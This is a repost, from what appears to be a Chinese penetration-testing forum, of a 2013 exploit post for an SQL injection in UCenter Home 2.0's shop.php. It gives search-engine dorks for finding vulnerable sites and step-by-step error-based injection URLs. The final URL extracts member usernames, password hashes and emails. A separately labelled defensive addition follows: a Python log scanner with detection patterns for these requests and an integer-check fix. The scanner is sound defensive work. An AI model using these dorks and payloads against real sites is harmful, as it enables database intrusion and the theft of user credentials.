China Network Penetration Testing Alliance

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit the DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
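
For defenders, a log check for requests of the kind shown above, as an added example that is not part of the original post or of UCenter Home: it flags any shop.php request whose shopid is not a plain integer or carries the error-based markers seen in the advisory, and it goes slightly further by undoing repeated URL-encoding and inline SQL comments. The rule names, the sample log lines and the assumption that a legitimate shopid is always an integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2013:21:31:02 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Feb/2013:21:32:10 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),'
    'concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [27/Feb/2013:21:32:40 +0800] "GET /shop.php?ac=view&shopid=253%2520AnD(SeLeCt'
    '/**/1/**/FrOm%2520information_schema.tables) HTTP/1.1" 200 799',
    '198.51.100.7 - - [27/Feb/2013:21:33:00 +0800] "GET /space.php?uid=12 HTTP/1.1" 200 4410',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
SIGNATURES = {  # hypothetical rule names, keyed to markers visible in the advisory
    "information_schema": re.compile(r"information_schema", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "concat_hex": re.compile(r"concat\s*\(\s*0x", re.I),
}

def normalize(value, rounds=3):
    """Undo repeated URL-encoding and strip inline SQL comments used for evasion."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"/\*.*?\*/", " ", value, flags=re.S)

def inspect_line(line):
    """Return the rule names a shop.php request triggers, or [] if it looks clean."""
    m = REQUEST.search(line)
    url = urlsplit(m.group(1)) if m else None
    if url is None or not url.path.lower().endswith("/shop.php"):
        return []
    findings = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        value = normalize(raw)
        if not re.fullmatch(r"\d{1,10}", value.strip()):
            findings.append("non_integer_shopid")  # assumption: ids are plain integers
        findings += [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return findings

def scan(lines):  # (client address, findings) for every offending line
    return [(l.split()[0], f) for l in lines if (f := inspect_line(l))]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same integer check, applied in the application before shopid reaches the query, is the corresponding fix on the server side.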





Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2